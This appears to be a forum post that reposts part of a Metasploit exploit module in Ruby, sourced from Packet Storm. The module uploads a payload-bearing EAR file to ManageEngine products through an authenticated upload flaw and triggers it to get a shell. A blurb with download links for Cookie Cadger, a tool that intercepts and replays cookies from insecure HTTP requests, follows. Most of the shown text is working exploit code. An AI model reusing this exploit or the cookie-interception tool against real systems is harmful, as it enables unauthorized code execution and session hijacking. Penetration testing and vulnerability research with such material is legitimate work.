fail_with(Exploit::Failure::Unknown, "#{peer} - Bogus file upload failed") end end # Now send the actual payload print_status("#{peer} - Uploading EAR file...") res = send_multipart_request(cookie, ear_file_name, ear_file.pack) if res && res.code == 200 print_status("#{peer} - Upload appears to have been successful") else fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed") end 10.times do select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Success! Triggered the payload, should have a shell incoming break if res.code == 200 end end end Source : ManageEngine Multiple Products Authenticated File Upload ? Packet Storm
  9. LINK DOWNLOAD What is Cookie Cadger? Cookie Cadger helps identify information leakage from applications that utilize insecure HTTP GET requests. Web providers have started stepping up to the plate since Firesheep was released in 2010. Today, most major websites can provide SSL/TLS during all transactions, preventing cookie data from leaking over wired Ethernet or insecure Wi-Fi. But the fact remains that Firesheep was more of a toy than a tool. Cookie Cadger is the first open-source pen-testing tool ever made for intercepting and replaying specific insecure HTTP GET requests into a browser. Cookie Cadger is a graphical utility which harnesses the power of the Wireshark suite and Java to provide a fully cross-platform, entirely open-source utility which can monitor wired Ethernet, insecure Wi-Fi, or load a packet capture file for offline analysis LINK DOWNLOAD
×
×
  • Create New...